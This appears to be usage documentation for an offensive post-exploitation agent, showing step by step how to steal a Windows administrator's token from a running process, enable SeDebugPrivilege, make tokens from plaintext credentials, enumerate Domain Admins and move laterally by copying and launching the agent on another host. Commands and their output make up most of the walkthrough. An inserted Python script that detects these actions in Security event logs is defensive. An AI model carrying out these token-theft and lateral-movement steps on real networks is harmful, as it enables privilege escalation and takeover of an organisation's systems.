Token Manipulation

This walkthrough covers the full Windows token workflow - from identifying a target identity to stealing its token, operating under it, and reverting cleanly. Token-based impersonation avoids passing plaintext credentials and leaves a smaller footprint than runas.

Prerequisites

  • An active agent on a Windows machine
  • A process running under the target identity is already present on the machine (for token-steal)
  • OR valid credentials for the target user (for token-make)

How Token Storage Works

The agent maintains an internal token store - a numbered list of Windows tokens it has collected or created. Commands that support impersonation (including lateral movement commands) use the currently applied token.

token-steal / token-make
  run commands    ← all commands execute under the applied identity
token-use --nr 0  ← revert to the agent's original token

Workflow A - Steal a token from a running process

Step 1 - Find a process running as the target identity

ps

Output:

PID    PPID   Process          Arch                   Integrity  User
----   ----   ----             ----                   ----       ----
...
4832   1204   explorer.exe     x64                    Medium     CORP\jsmith
6240   580    mmc.exe          x64                    High       CORP\Administrator

Identify a process owned by CORP\Administrator - here PID 6240.

Step 2 - Enable SeDebugPrivilege (commercial payload only)

Stealing tokens from processes owned by other users requires elevated privileges. If running as a local admin but SeDebugPrivilege is not yet active:

privilege-enable --privilege SeDebugPrivilege

Output:

Available but not enabled privileges in process token:
  * SeIncreaseQuotaPrivilege
  * SeSecurityPrivilege
  * SeTakeOwnershipPrivilege
  * SeLoadDriverPrivilege
  * SeSystemProfilePrivilege
  * SeSystemtimePrivilege
  * SeProfileSingleProcessPrivilege
  * SeIncreaseBasePriorityPrivilege
  * SeCreatePagefilePrivilege
  * SeBackupPrivilege
  * SeRestorePrivilege
  * SeShutdownPrivilege
  * SeSystemEnvironmentPrivilege
  * SeRemoteShutdownPrivilege
  * SeUndockPrivilege
  * SeManageVolumePrivilege
  * SeIncreaseWorkingSetPrivilege
  * SeTimeZonePrivilege
  * SeCreateSymbolicLinkPrivilege
  * SeDelegateSessionUserImpersonatePrivilege
Enabled privileges in process token:
  * SeDebugPrivilege
  * SeChangeNotifyPrivilege
  * SeImpersonatePrivilege
  * SeCreateGlobalPrivilege

Step 3 - Steal the token (the stolen token is also applied automatically)

token-steal --pid 6240

Output:

1: CORP\Administrator

Step 4 - Operate as the impersonated user

All subsequent commands now run under CORP\Administrator:

run --cmdline "whoami"

Output:

corp\administrator

run --cmdline "net group \"Domain Admins\" /domain"

Step 5 - Revert to the original token

When done, restore the agent's default identity:

token-use --nr 0

Workflow B - Create a token from credentials

Use this when you have plaintext credentials but no process running as that user is present on the machine.

Step 1 - Create the token

token-make --username "CORP\svc_backup" --password "BackupPass1!" --netonly true

Output:

1: CORP\svc_backup [netonly]

Info

--netonly true creates a token whose credentials are used only for network authentication; the local process identity stays unchanged. This is equivalent to runas /netonly and is useful for accessing network resources (SMB, LDAP, WinRM) without fully impersonating the user locally.
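As an added defender-side example (not part of this tool's documentation), the following Python script shows how the two operations described on this page, enabling SeDebugPrivilege in Step 2 of Workflow A and creating a netonly token here, appear in the Windows Security log. A netonly token is an Event 4624 logon with LogonType 9 (NewCredentials), the same type runas /netonly produces; adjusting privileges on a process token writes Event 4703 ("A user right was adjusted") when "Audit Token Right Adjusted" is enabled. The event records are constructed, and the process allowlist and the field names used are assumptions modelled on the standard 4624/4703 event fields.

```python
"""Added detection example: flag NewCredentials logons and SeDebugPrivilege
enablement in Windows Security events. Events below are constructed."""

# 4624 LogonType 9 = NewCredentials: runas /netonly or
# LogonUser(LOGON32_LOGON_NEW_CREDENTIALS). The local identity is unchanged,
# so the account in the event is the caller, not the alternate credential.
NEWCREDENTIALS_LOGON = 9

# Constructed allowlist (assumption): images expected to produce these events
# on a healthy host. Tune to the environment; compare case-insensitively.
EXPECTED_PROCESSES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\lsass.exe",
}


def _privileges(field):
    """4703 lists privileges as whitespace-separated names, or '-' when empty."""
    field = (field or "").strip()
    return set() if field in ("", "-") else set(field.split())


def _expected(process):
    return (process or "").lower() in EXPECTED_PROCESSES


def find_token_activity(events):
    """Return one finding per suspicious event: netonly logons and
    SeDebugPrivilege enablement from processes outside the allowlist."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        proc = ev.get("ProcessName", "")
        if eid == 4624 and ev.get("LogonType") == NEWCREDENTIALS_LOGON:
            if not _expected(proc):
                findings.append({
                    "rule": "netonly_logon",
                    "account": f"{ev.get('TargetDomainName')}\\{ev.get('TargetUserName')}",
                    "process": proc,
                })
        elif eid == 4703:
            enabled = _privileges(ev.get("EnabledPrivilegeList"))
            if "SeDebugPrivilege" in enabled and not _expected(proc):
                findings.append({
                    "rule": "sedebug_enabled",
                    "account": f"{ev.get('SubjectDomainName')}\\{ev.get('SubjectUserName')}",
                    "process": proc,
                })
    return findings


# Constructed sample events, flattened the way a SIEM would extract them.
SAMPLE_EVENTS = [
    # Ordinary interactive logon: not flagged.
    {"EventID": 4624, "LogonType": 2, "TargetDomainName": "CORP",
     "TargetUserName": "jsmith", "ProcessName": r"C:\Windows\System32\winlogon.exe"},
    # NewCredentials logon from an allowlisted image: not flagged.
    {"EventID": 4624, "LogonType": 9, "TargetDomainName": "CORP",
     "TargetUserName": "jsmith", "ProcessName": r"C:\Windows\System32\svchost.exe"},
    # NewCredentials logon from a user-writable path: flagged (token-make --netonly).
    {"EventID": 4624, "LogonType": 9, "TargetDomainName": "CORP",
     "TargetUserName": "jsmith",
     "ProcessName": r"C:\Users\jsmith\AppData\Local\Temp\agent.exe"},
    # Privilege adjustment that does not involve SeDebugPrivilege: not flagged.
    {"EventID": 4703, "SubjectDomainName": "CORP", "SubjectUserName": "jsmith",
     "ProcessName": r"C:\Users\jsmith\AppData\Local\Temp\agent.exe",
     "EnabledPrivilegeList": "SeChangeNotifyPrivilege", "DisabledPrivilegeList": "-"},
    # SeDebugPrivilege enabled by a non-allowlisted image: flagged (privilege-enable).
    {"EventID": 4703, "SubjectDomainName": "CORP", "SubjectUserName": "jsmith",
     "ProcessName": r"C:\Users\jsmith\AppData\Local\Temp\agent.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege\n\t\t\tSeBackupPrivilege",
     "DisabledPrivilegeList": "-"},
]

if __name__ == "__main__":
    for finding in find_token_activity(SAMPLE_EVENTS):
        print(finding)
```

Both rules key on the originating process image rather than on the event alone, because LogonType 9 and 4703 occur legitimately (administrators using runas /netonly, services adjusting their own privileges); 4703 in particular is only present when the "Audit Token Right Adjusted" subcategory is switched on, so confirm that policy before relying on the second rule.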

Cleanup

Remove tokens that are no longer needed:

token-del --nr 1

Or clear the entire store:

token-del-all

Using Tokens with Lateral Movement

The jump-wmi, jump-service, and jump-winrm commands all respect the currently applied token. Instead of passing --username and --password, apply the token first:

token-steal --pid 6240
jump-wmi --target 10.10.10.20 --payloadId abc123 --copyMethod SMB
  --copyPath C:\Windows\Temp\agent.exe --cmdline C:\Windows\Temp\agent.exe

See the Lateral Movement use case for a full walkthrough of this pattern.